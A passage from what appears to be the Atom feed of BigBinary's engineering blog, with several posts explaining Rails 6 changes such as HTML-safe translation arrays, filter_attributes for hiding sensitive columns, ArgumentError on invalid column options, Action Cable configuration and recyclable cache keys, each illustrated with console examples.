            - React Native &amp;#9883; &amp;#128241;</code></pre><pre><code class="language-erb">&lt;!-- app/views/home/index.html.erb --&gt;
&lt;%= t('.title_html') %&gt;
&lt;%= t('.description_html') %&gt;
&lt;%= t('.sections.blogs.title_html') %&gt;
&lt;%= t('.sections.blogs.description_html') %&gt;
&lt;%= t('.sections.services.title_html') %&gt;
&lt;ul&gt;
  &lt;% t('.sections.services.list_html').each do |service| %&gt;
    &lt;li&gt;&lt;%= service %&gt;&lt;/li&gt;
  &lt;% end %&gt;
&lt;/ul&gt;</code></pre><p>The rendered page escapes the unsafe HTML while rendering the array of translations for the key <code>.sections.services.list_html</code> even though that key has the <code>_html</code> suffix.</p><p><img src="/blog_images/2019/rails-6-marks-arrays-of-translations-as-trusted-safe-by-using-the-_html-suffix/before-rails-6-i18n-_html-suffix-with-array-key.png" alt="before-rails-6"></p><p>A workaround is to manually mark all the translations in that array as HTML safe using methods such as <code>#raw</code> or <code>#html_safe</code>.</p><pre><code class="language-erb">&lt;!-- app/views/home/index.html.erb --&gt;
&lt;%= t('.title_html') %&gt;
&lt;%= t('.description_html') %&gt;
&lt;%= t('.sections.blogs.title_html') %&gt;
&lt;%= t('.sections.blogs.description_html') %&gt;
&lt;%= t('.sections.services.title_html') %&gt;
&lt;ul&gt;
  &lt;% t('.sections.services.list_html').each do |service| %&gt;
    &lt;li&gt;&lt;%= service.html_safe %&gt;&lt;/li&gt;
  &lt;% end %&gt;
&lt;/ul&gt;</code></pre><p><img src="/blog_images/2019/rails-6-marks-arrays-of-translations-as-trusted-safe-by-using-the-_html-suffix/rails-6-i18n-array-key-with-_html-suffix.png" alt="rails-6-i18n"></p><h3>Arrays of translations are trusted as HTML safe by using the '_html' suffix in Rails 6</h3><p>In Rails 6, the unexpected behavior of not marking an array of translations as HTML safe even though the key of that array has the <code>_html</code> suffix is fixed.</p><pre><code class="language-yaml"># config/locales/en.yml
en:
  home:
    index:
      title_html: &lt;h2&gt;We build web &amp; mobile applications&lt;/h2&gt;
      description_html: We are a dynamic team of &lt;em&gt;developers&lt;/em&gt; and &lt;em&gt;designers&lt;/em&gt;.
      sections:
        blogs:
          title_html: &lt;h3&gt;Blogs &amp; publications&lt;/h3&gt;
          description_html: We regularly write our blog. Our blogs are covered by &lt;strong&gt;Ruby Inside&lt;/strong&gt; and &lt;strong&gt;Ruby Weekly Newsletter&lt;/strong&gt;.
        services:
          title_html: &lt;h3&gt;Services we offer&lt;/h3&gt;
          list_html:
            - &lt;strong&gt;Ruby on Rails&lt;/strong&gt;
            - React.js &amp;#9883;
            - React Native &amp;#9883; &amp;#128241;</code></pre><pre><code class="language-erb">&lt;!-- app/views/home/index.html.erb --&gt;
&lt;%= t('.title_html') %&gt;
&lt;%= t('.description_html') %&gt;
&lt;%= t('.sections.blogs.title_html') %&gt;
&lt;%= t('.sections.blogs.description_html') %&gt;
&lt;%= t('.sections.services.title_html') %&gt;
&lt;ul&gt;
  &lt;% t('.sections.services.list_html').each do |service| %&gt;
    &lt;li&gt;&lt;%= service %&gt;&lt;/li&gt;
  &lt;% end %&gt;
&lt;/ul&gt;</code></pre><p><img src="/blog_images/2019/rails-6-marks-arrays-of-translations-as-trusted-safe-by-using-the-_html-suffix/rails-6-i18n-array-key-with-_html-suffix.png" alt="rails-6-i18n"></p><p>We can see above that we no longer need to manually mark the translations as HTML safe for the key <code>.sections.services.list_html</code> using methods such as <code>#raw</code> or <code>#html_safe</code>, since that key has the <code>_html</code> suffix.</p><hr><p>To learn more about this feature, please check out <a href="https://github.com/rails/rails/pull/32361">rails/rails#32361</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds filter_attributes on ActiveRecord::Base]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-activerecord-base-filter_attributes"/>
      <updated>2019-09-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-activerecord-base-filter_attributes</id>
      <content type="html"><![CDATA[<p>A lot of times, we ask users for sensitive data such as a password, credit card number, etc. We should not be able to see this information in logs. So, there must be a way in Rails to filter out these parameters from logs.</p><p>Rails provides a way of doing this. We can add parameters to <a href="https://guides.rubyonrails.org/configuring.html#initializers">Rails.application.config.filter_parameters</a>.</p><p>There is one more way of doing this in Rails. We can also use <a href="https://api.rubyonrails.org/classes/ActionDispatch/Http/FilterParameters.html">https://api.rubyonrails.org/classes/ActionDispatch/Http/FilterParameters.html</a>.</p><p>However, there is still a security issue when we call <code>inspect</code> on an ActiveRecord object for logging purposes. In this case, Rails does not consider <a href="https://guides.rubyonrails.org/configuring.html#initializers">Rails.application.config.filter_parameters</a> and displays the sensitive information.</p><p>Rails 6 fixes this. 
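</p><p>For reference, the <code>Rails.application.config.filter_parameters</code> list mentioned above is usually extended in the generated initializer. A minimal sketch (the <code>:credit_card_number</code> key is a hypothetical name used for illustration, not one from this post):</p>

```ruby
# config/initializers/filter_parameter_logging.rb
# Values for these keys show up as [FILTERED] in request logs.
# :credit_card_number is a hypothetical parameter name for illustration.
Rails.application.config.filter_parameters += [:password, :credit_card_number]
```

<p>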
It considers <a href="https://guides.rubyonrails.org/configuring.html#initializers">Rails.application.config.filter_parameters</a> while inspecting an object.</p><p>Rails 6 also provides an alternative way to filter columns at the ActiveRecord level by adding <a href="https://github.com/rails/rails/pull/33756">filter_attributes</a> on ActiveRecord::Base.</p><p>In Rails 6, <a href="https://github.com/rails/rails/pull/33756">filter_attributes</a> on ActiveRecord::Base takes priority over <a href="https://guides.rubyonrails.org/configuring.html#initializers">Rails.application.config.filter_parameters</a>.</p><p>Let's check out how it works.</p><h4>Rails 6.0.0.rc1</h4><p>Let's create a user record and call <code>inspect</code> on it.</p><pre><code class="language-ruby">&gt;&gt; class User &lt; ApplicationRecord
&gt;&gt;   validates :email, :password, presence: true
&gt;&gt; end
=&gt; {:presence=&gt;true}

&gt;&gt; User.create(email: 'john@bigbinary.com', password: 'john_wick_bigbinary')
BEGIN
  User Create (0.6ms)  INSERT INTO &quot;users&quot; (&quot;email&quot;, &quot;password&quot;, &quot;created_at&quot;, &quot;updated_at&quot;) VALUES ($1, $2, $3, $4) RETURNING &quot;id&quot;  [[&quot;email&quot;, &quot;john@bigbinary.com&quot;], [&quot;password&quot;, &quot;john_wick_bigbinary&quot;], [&quot;created_at&quot;, &quot;2019-05-17 21:34:34.504394&quot;], [&quot;updated_at&quot;, &quot;2019-05-17 21:34:34.504394&quot;]]
COMMIT
=&gt; #&lt;User id: 2, email: &quot;john@bigbinary.com&quot;, password: [FILTERED], created_at: &quot;2019-05-17 21:34:34&quot;, updated_at: &quot;2019-05-17 21:34:34&quot;&gt;</code></pre><p>We can see that <code>password</code> is filtered as it is added to <a href="https://guides.rubyonrails.org/configuring.html#initializers">Rails.application.config.filter_parameters</a> by default in <code>config/initializers/filter_parameter_logging.rb</code>.</p><p>Now let's add just <code>:email</code> to <code>User.filter_attributes</code>.</p><pre><code class="language-ruby">&gt;&gt; User.filter_attributes = [:email]
=&gt; [:email]

&gt;&gt; User.first.inspect
SELECT &quot;users&quot;.* FROM &quot;users&quot; ORDER BY &quot;users&quot;.&quot;id&quot; ASC LIMIT $1  [[&quot;LIMIT&quot;, 1]]
=&gt; &quot;#&lt;User id: 2, email: [FILTERED], password: \&quot;john_wick_bigbinary\&quot;, created_at: \&quot;2019-05-17 21:34:34\&quot;, updated_at: \&quot;2019-05-17 21:34:34\&quot;&gt;&quot;</code></pre><p>We can see here that <code>User.filter_attributes</code> took priority over <a href="https://guides.rubyonrails.org/configuring.html#initializers">Rails.application.config.filter_parameters</a>, removed the filtering from <code>password</code>, and filtered just <code>email</code>.</p><p>Now, let's add both <code>:email</code> and <code>:password</code> to <code>User.filter_attributes</code>.</p><pre><code class="language-ruby">&gt;&gt; User.filter_attributes = [:email, :password]
=&gt; [:email, :password]

&gt;&gt; User.first.inspect
=&gt; &quot;#&lt;User id: 2, email: [FILTERED], password: [FILTERED], created_at: \&quot;2019-05-17 21:34:34\&quot;, updated_at: \&quot;2019-05-17 21:34:34\&quot;&gt;&quot;</code></pre><p>We can see that now both <code>email</code> and <code>password</code> are filtered out.</p><p>Here is the relevant <a href="https://github.com/rails/rails/pull/33756">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 raises ArgumentError for invalid :limit and :precision]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-raises-argumenterror-for-invalid-limit-and-precision"/>
      <updated>2019-08-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-raises-argumenterror-for-invalid-limit-and-precision</id>
      <content type="html"><![CDATA[<p>Rails 6 raises <a href="https://apidock.com/ruby/ArgumentError">ArgumentError</a> when <code>:limit</code> and <code>:precision</code> are used with invalid datatypes.</p><p>Before Rails 6, it used to raise <a href="https://api.rubyonrails.org/classes/ActiveRecord/ActiveRecordError.html">ActiveRecord::ActiveRecordError</a>.</p><p>Let's check out how it works.</p><h4>Rails 5.2</h4><p>Let's create an orders table and try using <code>:limit</code> with a column named <code>quantity</code> with data type <code>integer</code>.</p><pre><code class="language-ruby">&gt;&gt; class CreateOrders &lt; ActiveRecord::Migration[5.2]
&gt;&gt;   def change
&gt;&gt;     create_table :orders do |t|
&gt;&gt;       t.string :item
&gt;&gt;       t.integer :quantity, limit: 10
&gt;&gt;
&gt;&gt;       t.timestamps
&gt;&gt;     end
&gt;&gt;
&gt;&gt;   end
&gt;&gt; end
=&gt; :change

&gt;&gt; CreateOrders.new.change
-- create_table(:orders)
Traceback (most recent call last):
        2: from (irb):11
        1: from (irb):3:in 'change'
ActiveRecord::ActiveRecordError (No integer type has byte size 10. Use a numeric with scale 0 instead.)</code></pre><p>We can see that the use of <code>:limit</code> with an <code>integer</code> column raises <a href="https://api.rubyonrails.org/classes/ActiveRecord/ActiveRecordError.html">ActiveRecord::ActiveRecordError</a> in <code>Rails 5.2</code>.</p><p>Now let's try using a <code>:precision</code> of <code>10</code> with a <code>datetime</code> column.</p><pre><code class="language-ruby">&gt;&gt; class CreateOrders &lt; ActiveRecord::Migration[5.2]
&gt;&gt;   def change
&gt;&gt;     create_table :orders do |t|
&gt;&gt;       t.string :item
&gt;&gt;       t.integer :quantity
&gt;&gt;       t.datetime :completed_at, precision: 10
&gt;&gt;
&gt;&gt;       t.timestamps
&gt;&gt;     end
&gt;&gt;
&gt;&gt;   end
&gt;&gt; end
=&gt; :change

&gt;&gt; CreateOrders.new.change
-- create_table(:orders)
Traceback (most recent call last):
        2: from (irb):12
        1: from (irb):3:in 'change'
ActiveRecord::ActiveRecordError (No timestamp type has precision of 10. The allowed range of precision is from 0 to 6)</code></pre><p>We can see that an invalid value of <code>:precision</code> with a <code>datetime</code> column also raises <a href="https://api.rubyonrails.org/classes/ActiveRecord/ActiveRecordError.html">ActiveRecord::ActiveRecordError</a> in <code>Rails 5.2</code>.</p><h4>Rails 6.0.0.rc1</h4><p>Let's create an orders table and try using <code>:limit</code> with a column named <code>quantity</code> with data type <code>integer</code> in Rails 6.</p><pre><code class="language-ruby">&gt;&gt; class CreateOrders &lt; ActiveRecord::Migration[6.0]
&gt;&gt;   def change
&gt;&gt;     create_table :orders do |t|
&gt;&gt;       t.string :item
&gt;&gt;       t.integer :quantity, limit: 10
&gt;&gt;
&gt;&gt;       t.timestamps
&gt;&gt;     end
&gt;&gt;
&gt;&gt;   end
&gt;&gt; end
=&gt; :change

&gt;&gt; CreateOrders.new.change
-- create_table(:orders)
Traceback (most recent call last):
        2: from (irb):11
        1: from (irb):3:in 'change'
ArgumentError (No integer type has byte size 10. Use a numeric with scale 0 instead.)</code></pre><p>We can see that the use of <code>:limit</code> with an <code>integer</code> column raises <a href="https://apidock.com/ruby/ArgumentError">ArgumentError</a> in <code>Rails 6</code>.</p><p>Now let's try using a <code>:precision</code> of <code>10</code> with a <code>datetime</code> column.</p><pre><code class="language-ruby">&gt;&gt; class CreateOrders &lt; ActiveRecord::Migration[6.0]
&gt;&gt;   def change
&gt;&gt;     create_table :orders do |t|
&gt;&gt;       t.string :item
&gt;&gt;       t.integer :quantity
&gt;&gt;       t.datetime :completed_at, precision: 10
&gt;&gt;
&gt;&gt;       t.timestamps
&gt;&gt;     end
&gt;&gt;
&gt;&gt;   end
&gt;&gt; end
=&gt; :change

&gt;&gt; CreateOrders.new.change
-- create_table(:orders)
Traceback (most recent call last):
        2: from (irb):12
        1: from (irb):3:in 'change'
ArgumentError (No timestamp type has precision of 10. The allowed range of precision is from 0 to 6)</code></pre><p>We can see that an invalid value of <code>:precision</code> with a <code>datetime</code> column also raises <a href="https://apidock.com/ruby/ArgumentError">ArgumentError</a> in <code>Rails 6</code>.</p><p>Here is the relevant <a href="https://github.com/rails/rails/pull/35887">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 allows passing custom configuration to ActionCable::Server::Base]]></title>
       <author><name>Taha Husain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-allows-passing-custom-configuration-to-actioncable-server-base"/>
      <updated>2019-08-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-allows-passing-custom-configuration-to-actioncable-server-base</id>
      <content type="html"><![CDATA[<p>Before Rails 6, the Action Cable server used the default configuration on boot up, unless custom configuration was provided explicitly.</p><p>Custom configuration can be mentioned in either <code>config/cable.yml</code> or <code>config/application.rb</code> as shown below.</p><pre><code class="language-yaml"># config/cable.yml
production:
  url: redis://redis.example.com:6379
  adapter: redis
  channel_prefix: custom_</code></pre><p>Or</p><pre><code class="language-ruby"># config/application.rb
config.action_cable.cable = { adapter: &quot;redis&quot;, channel_prefix: &quot;custom_&quot; }</code></pre><p>In some cases, we need another Action Cable server running separately from the application with a different set of configuration.</p><p>The problem is that both approaches mentioned earlier set the Action Cable server configuration on application boot up. This configuration cannot be changed for the second server.</p><p>Rails 6 has added a provision to pass custom configuration. Rails 6 allows us to pass an <code>ActionCable::Server::Configuration</code> object as an option when initializing a new Action Cable server.</p><pre><code class="language-ruby">config = ActionCable::Server::Configuration.new
config.cable = { adapter: &quot;redis&quot;, channel_prefix: &quot;custom_&quot; }

ActionCable::Server::Base.new(config: config)</code></pre><p>For more details on Action Cable configurations, head to the <a href="https://edgeguides.rubyonrails.org/action_cable_overview.html#configuration">Action Cable docs</a>.</p><p>Here's the relevant <a href="https://github.com/rails/rails/pull/34714">pull request</a> for this change.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds support for symbol keys to HashWithIndifferentAccess#assoc]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-activesupport-hashwithindifferentaccess-assoc"/>
      <updated>2019-08-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-activesupport-hashwithindifferentaccess-assoc</id>
      <content type="html"><![CDATA[<p>Rails 6 added support for symbol keys with <a href="https://api.rubyonrails.org/v5.2/classes/ActiveSupport/HashWithIndifferentAccess.html#method-i-assoc">ActiveSupport::HashWithIndifferentAccess#assoc</a>.</p><p>Please note that the documentation of <a href="https://api.rubyonrails.org/v5.2/classes/ActiveSupport/HashWithIndifferentAccess.html#method-i-assoc">ActiveSupport::HashWithIndifferentAccess#assoc</a> in Rails 5.2 shows that it works with symbol keys, but it doesn't.</p><p>In Rails 6, <a href="https://github.com/rails/rails/pull/35080">ActiveSupport::HashWithIndifferentAccess</a> implements a hash where string and symbol keys are considered to be the same.</p><p>Before Rails 6, <code>HashWithIndifferentAccess#assoc</code> used to work with just string keys.</p><p>Let's check out how it works.</p><h4>Rails 5.2</h4><p>Let's create an object of <a href="https://api.rubyonrails.org/v5.2/classes/ActiveSupport/HashWithIndifferentAccess.html">ActiveSupport::HashWithIndifferentAccess</a> and call <code>assoc</code> on that object.</p><pre><code class="language-ruby">&gt;&gt; info = { name: 'Mark', email: 'mark@bigbinary.com' }.with_indifferent_access
=&gt; {&quot;name&quot;=&gt;&quot;Mark&quot;, &quot;email&quot;=&gt;&quot;mark@bigbinary.com&quot;}

&gt;&gt; info.assoc(:name)
=&gt; nil

&gt;&gt; info.assoc('name')
=&gt; [&quot;name&quot;, &quot;Mark&quot;]</code></pre><p>We can see that <code>assoc</code> does not work with symbol keys with <a href="https://api.rubyonrails.org/v5.2/classes/ActiveSupport/HashWithIndifferentAccess.html">ActiveSupport::HashWithIndifferentAccess</a> in Rails 5.2.</p><h4>Rails 6.0.0.beta2</h4><p>Now, let's call <code>assoc</code> on the same hash in Rails 6 with both string and symbol keys.</p><pre><code class="language-ruby">&gt;&gt; info = { name: 'Mark', email: 'mark@bigbinary.com' }.with_indifferent_access
=&gt; {&quot;name&quot;=&gt;&quot;Mark&quot;, &quot;email&quot;=&gt;&quot;mark@bigbinary.com&quot;}

&gt;&gt; info.assoc(:name)
=&gt; [&quot;name&quot;, &quot;Mark&quot;]

&gt;&gt; info.assoc('name')
=&gt; [&quot;name&quot;, &quot;Mark&quot;]</code></pre><p>As we can see, <code>assoc</code> works perfectly fine with both string and symbol keys with <a href="https://api.rubyonrails.org/v5.2/classes/ActiveSupport/HashWithIndifferentAccess.html">ActiveSupport::HashWithIndifferentAccess</a> in Rails 6.</p><p>Here is the relevant <a href="https://github.com/rails/rails/pull/35080">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 preserves status of #html_safe?]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-preserves-status-of-html_safe-on-sliced-and-multiplied-html-safe-strings"/>
      <updated>2019-08-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-preserves-status-of-html_safe-on-sliced-and-multiplied-html-safe-strings</id>
      <content type="html"><![CDATA[<h2>Before Rails 6</h2><p>Before Rails 6, calling <code>#html_safe?</code> on a slice of an HTML safe string returns <code>nil</code>.</p><pre><code class="language-ruby">&gt;&gt; html_content = &quot;&lt;div&gt;Hello, world!&lt;/div&gt;&quot;.html_safe
# =&gt; &quot;&lt;div&gt;Hello, world!&lt;/div&gt;&quot;

&gt;&gt; html_content.html_safe?
# =&gt; true

&gt;&gt; html_content[0..-1].html_safe?
# =&gt; nil</code></pre><p>Also, before Rails 6, the <code>ActiveSupport::SafeBuffer#*</code> method does not preserve the HTML safe status either.</p><pre><code class="language-ruby">&gt;&gt; line_break = &quot;&lt;br /&gt;&quot;.html_safe
# =&gt; &quot;&lt;br /&gt;&quot;

&gt;&gt; line_break.html_safe?
# =&gt; true

&gt;&gt; two_line_breaks = (line_break * 2)
# =&gt; &quot;&lt;br /&gt;&lt;br /&gt;&quot;

&gt;&gt; two_line_breaks.html_safe?
# =&gt; nil</code></pre><h2>Rails 6 returns expected status of <code>#html_safe?</code></h2><p>In Rails 6, both of the above cases have been fixed.</p><p>Therefore, we will now get the status of <code>#html_safe?</code> as expected.</p><pre><code class="language-ruby">&gt;&gt; html_content = &quot;&lt;div&gt;Hello, world!&lt;/div&gt;&quot;.html_safe
# =&gt; &quot;&lt;div&gt;Hello, world!&lt;/div&gt;&quot;

&gt;&gt; html_content.html_safe?
# =&gt; true

&gt;&gt; html_content[0..-1].html_safe?
# =&gt; true

&gt;&gt; line_break = &quot;&lt;br /&gt;&quot;.html_safe
# =&gt; &quot;&lt;br /&gt;&quot;

&gt;&gt; line_break.html_safe?
# =&gt; true

&gt;&gt; two_line_breaks = (line_break * 2)
# =&gt; &quot;&lt;br /&gt;&lt;br /&gt;&quot;

&gt;&gt; two_line_breaks.html_safe?
# =&gt; true</code></pre><p>Please check <a href="https://github.com/rails/rails/pull/33808">rails/rails#33808</a> and <a href="https://github.com/rails/rails/pull/36012">rails/rails#36012</a> for the relevant changes.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Recyclable cache keys in Rails]]></title>
       <author><name>Taha Husain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-adds-support-for-recyclable-cache-keys"/>
      <updated>2019-08-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-adds-support-for-recyclable-cache-keys</id>
      <content type="html"><![CDATA[<p><a href="https://github.com/rails/rails/pull/29092">Recyclable cache keys</a> or <em>cache versioning</em> was introduced in Rails 5.2. Large applications frequently need to invalidate their cache because the cache store has limited memory. We can optimize cache storage and minimize cache misses using recyclable cache keys.</p><p>Recyclable cache keys are supported by all <a href="https://guides.rubyonrails.org/caching_with_rails.html#cache-stores">cache stores</a> that ship with Rails.</p><p>Before Rails 5.2, <code>cache_key</code>'s format was <em>{model_name}/{id}-{updated_at}</em>. Here <code>model_name</code> and <code>id</code> are always constant for an object and <code>updated_at</code> changes on every update.</p><h4>Rails 5.1</h4><pre><code class="language-ruby">&gt;&gt; post = Post.last
&gt;&gt; post.cache_key
=&gt; &quot;posts/1-20190522104553296111&quot;

# Update post
&gt;&gt; post.touch
&gt;&gt; post.cache_key
=&gt; &quot;posts/1-20190525102103422069&quot; # cache_key changed</code></pre><p>In Rails 5.2, <code>#cache_key</code> returns <em>{model_name}/{id}</em> and the new method <code>#cache_version</code> returns <em>{updated_at}</em>.</p><h4>Rails 5.2</h4><pre><code class="language-ruby">&gt;&gt; ActiveRecord::Base.cache_versioning = true
&gt;&gt; post = Post.last
&gt;&gt; post.cache_key
=&gt; &quot;posts/1&quot;

&gt;&gt; post.cache_version
=&gt; &quot;20190522070715422750&quot;

&gt;&gt; post.cache_key_with_version
=&gt; &quot;posts/1-20190522070715422750&quot;</code></pre><p>Let's update the <code>post</code> instance and check <code>cache_key</code> and <code>cache_version</code>'s behaviour.</p><pre><code class="language-ruby">&gt;&gt; post.touch
&gt;&gt; post.cache_key
=&gt; &quot;posts/1&quot; # cache_key remains same

&gt;&gt; post.cache_version
=&gt; &quot;20190527062249879829&quot; # cache_version changed</code></pre><p>To use the cache versioning feature, we have to enable the <code>ActiveRecord::Base.cache_versioning</code> configuration. 
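</p><p>To make the recycling mechanics concrete, here is a plain-Ruby toy (not Rails code; <code>ToyCache</code> is an illustrative name) that mimics the behaviour of <code>Rails.cache.fetch(key, version:)</code>: one storage slot per key, where a version mismatch counts as a miss and overwrites the slot:</p>

```ruby
# A toy cache illustrating recyclable cache keys: one storage slot per key,
# where a version mismatch is treated as a miss and overwrites the slot.
# This sketches the idea only; it is not the Rails implementation.
class ToyCache
  def initialize
    @store = {} # key => [version, value]
  end

  def fetch(key, version:)
    stored_version, value = @store[key]
    return value if stored_version == version # hit: versions match

    return nil unless block_given?

    fresh = yield
    @store[key] = [version, fresh] # miss: recycle the single slot
    fresh
  end

  def size
    @store.size
  end
end

cache = ToyCache.new
cache.fetch("posts/1", version: "20190522070715") { "old post" }
cache.fetch("posts/1", version: "20190527062249") { "updated post" }
```

<p>With this model, updating a record changes only the version, so the stale copy is overwritten in place instead of piling up under a new key.</p><p>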
By default<code>cache_versioning</code> config is set to false for backward compatibility.</p><p>We can enable cache versioning configuration globally as shown below.</p><pre><code class="language-ruby">ActiveRecord::Base.cache_versioning = true# orconfig.active_record.cache_versioning = true</code></pre><p>Cache versioning config can be applied at model level.</p><pre><code class="language-ruby">class Post &lt; ActiveRecord::Base  self.cache_versioning = trueend# Or, when setting `#cache_versioning` outside the model -Post.cache_versioning = true</code></pre><p>Let's understand the problem step by step with cache keys before Rails 5.2.</p><h4>Rails 5.1 (without cache versioning)</h4><p><em>1. Write <code>post</code> instance to cache using<a href="https://apidock.com/rails/ActiveSupport/Cache/Store/fetch"><code>fetch</code></a> api.</em></p><pre><code class="language-ruby">&gt;&gt; before_update_cache_key = post.cache_key=&gt; &quot;posts/1-20190527062249879829&quot;&gt;&gt; Rails.cache.fetch(before_update_cache_key) { post }=&gt; #&lt;Post id: 1, title: &quot;First Post&quot;, created_at: &quot;2019-05-22 17:23:22&quot;, updated_at: &quot;2019-05-27 06:22:49&quot;&gt;</code></pre><p><em>2. Update <code>post</code> instance using<a href="https://apidock.com/rails/ActiveRecord/Persistence/touch"><code>touch</code></a>.</em></p><pre><code class="language-ruby">&gt;&gt; post.touch   (0.1ms)  begin transaction  Post Update (1.6ms)  UPDATE &quot;posts&quot; SET &quot;updated_at&quot; = ? WHERE &quot;posts&quot;.&quot;id&quot; = ?  [[&quot;updated_at&quot;, &quot;2019-05-27 08:01:52.975653&quot;], [&quot;id&quot;, 1]]   (1.2ms)  commit transaction=&gt; true</code></pre><p><em>3. 
Verify stale <code>cache_key</code> in cache store.</em></p><pre><code class="language-ruby">&gt;&gt; Rails.cache.fetch(before_update_cache_key)=&gt; #&lt;Post id: 1, title: &quot;First Post&quot;, created_at: &quot;2019-05-22 17:23:22&quot;, updated_at: &quot;2019-05-27 06:22:49&quot;&gt;</code></pre><p><em>4. Write updated <code>post</code> instance to cache using new <code>cache_key</code>.</em></p><pre><code class="language-ruby">&gt;&gt; after_update_cache_key = post.cache_key=&gt; &quot;posts/1-20190527080152975653&quot;&gt;&gt; Rails.cache.fetch(after_update_cache_key) { post }=&gt; #&lt;Post id: 1, title: &quot;First Post&quot;, created_at: &quot;2019-05-22 17:23:22&quot;, updated_at: &quot;2019-05-27 08:01:52&quot;&gt;</code></pre><p><em>5. Cache store now has two copies of <code>post</code> instance.</em></p><pre><code class="language-ruby">&gt;&gt; Rails.cache.fetch(before_update_cache_key)=&gt; #&lt;Post id: 1, title: &quot;First Post&quot;, created_at: &quot;2019-05-22 17:23:22&quot;, updated_at: &quot;2019-05-27 06:22:49&quot;&gt;&gt;&gt; Rails.cache.fetch(after_update_cache_key)=&gt; #&lt;Post id: 1, title: &quot;First Post&quot;, created_at: &quot;2019-05-22 17:23:22&quot;, updated_at: &quot;2019-05-27 08:01:52&quot;&gt;</code></pre><p><em>cache_key</em> and its associated instance becomes irrelevant as soon as aninstance is updated. But it stays in cache store until it is manuallyinvalidated.</p><p>This sometimes result in overflowing cache store with stale keys and data. Inapplications that extensively use cache store, a huge chunk of cache store getsfilled with stale data frequently.</p><p>Now let's take a look at the same example. This time with <em>cache versioning</em> tounderstand how recyclable cache keys help optimize cache storage.</p><h4>Rails 5.2 (cache versioning)</h4><p><em>1. 
Write the <code>post</code> instance to the cache store with the <code>version</code> option.</em></p><pre><code class="language-ruby">&gt;&gt; ActiveRecord::Base.cache_versioning = true
&gt;&gt; post = Post.last
&gt;&gt; cache_key = post.cache_key
=&gt; &quot;posts/1&quot;
&gt;&gt; before_update_cache_version = post.cache_version
=&gt; &quot;20190527080152975653&quot;
&gt;&gt; Rails.cache.fetch(cache_key, version: before_update_cache_version) { post }
=&gt; #&lt;Post id: 1, title: &quot;First Post&quot;, created_at: &quot;2019-05-22 17:23:22&quot;, updated_at: &quot;2019-05-27 08:01:52&quot;&gt;</code></pre><p><em>2. Update the <code>post</code> instance.</em></p><pre><code class="language-ruby">&gt;&gt; post.touch
   (0.1ms)  begin transaction
  Post Update (0.4ms)  UPDATE &quot;posts&quot; SET &quot;updated_at&quot; = ? WHERE &quot;posts&quot;.&quot;id&quot; = ?  [[&quot;updated_at&quot;, &quot;2019-05-27 09:09:15.651029&quot;], [&quot;id&quot;, 1]]
   (0.7ms)  commit transaction
=&gt; true</code></pre><p><em>3. Verify the stale <code>cache_version</code> in the cache store.</em></p><pre><code class="language-ruby">&gt;&gt; Rails.cache.fetch(cache_key, version: before_update_cache_version)
=&gt; #&lt;Post id: 1, title: &quot;First Post&quot;, created_at: &quot;2019-05-22 17:23:22&quot;, updated_at: &quot;2019-05-27 08:01:52&quot;&gt;</code></pre><p><em>4. Write the updated <code>post</code> instance to the cache.</em></p><pre><code class="language-ruby">&gt;&gt; after_update_cache_version = post.cache_version
=&gt; &quot;20190527090915651029&quot;
&gt;&gt; Rails.cache.fetch(cache_key, version: after_update_cache_version) { post }
=&gt; #&lt;Post id: 1, title: &quot;First Post&quot;, created_at: &quot;2019-05-22 17:23:22&quot;, updated_at: &quot;2019-05-27 09:09:15&quot;&gt;</code></pre><p><em>5. 
The cache store has replaced the old copy of <code>post</code> with the new version automatically.</em></p><pre><code class="language-ruby">&gt;&gt; Rails.cache.fetch(cache_key, version: before_update_cache_version)
=&gt; nil
&gt;&gt; Rails.cache.fetch(cache_key, version: after_update_cache_version)
=&gt; #&lt;Post id: 1, title: &quot;First Post&quot;, created_at: &quot;2019-05-22 17:23:22&quot;, updated_at: &quot;2019-05-27 09:09:15&quot;&gt;</code></pre><p>The above example shows how recyclable cache keys maintain a single, latest copy of an instance. Stale versions are removed automatically when a new version is added to the cache store.</p><p><em>Rails 6</em> added <code>#cache_versioning</code> for <code>ActiveRecord::Relation</code>.</p><p>The <code>ActiveRecord::Base.collection_cache_versioning</code> configuration should be enabled to use the cache versioning feature on collections. It is set to false by default.</p><p>We can enable this configuration as shown below.</p><pre><code class="language-ruby">ActiveRecord::Base.collection_cache_versioning = true
# or
config.active_record.collection_cache_versioning = true</code></pre><p>Before Rails 6, <code>ActiveRecord::Relation</code> had a <code>cache_key</code> in the format <code>{table_name}/query-{query-hash}-{count}-{max(updated_at)}</code>.</p><p>In Rails 6, the cache key is split into a stable part, <code>cache_key</code> - <code>{table_name}/query-{query-hash}</code>, and a volatile part, <code>cache_version</code> - <code>{count}-{max(updated_at)}</code>.</p><p>For more information, check out the <a href="https://blog.bigbinary.com/2016/02/02/activerecord-relation-cache-key.html">blog on ActiveRecord::Relation#cache_key in Rails 5</a>.</p><h4>Rails 5.2</h4><pre><code class="language-ruby">&gt;&gt; posts = Post.all
&gt;&gt; posts.cache_key
=&gt; &quot;posts/query-00644b6a00f2ed4b925407d06501c8fb-3-20190522172326885804&quot;</code></pre><h4>Rails 6</h4><pre><code class="language-ruby">&gt;&gt; ActiveRecord::Base.collection_cache_versioning = true
&gt;&gt; posts = Post.all
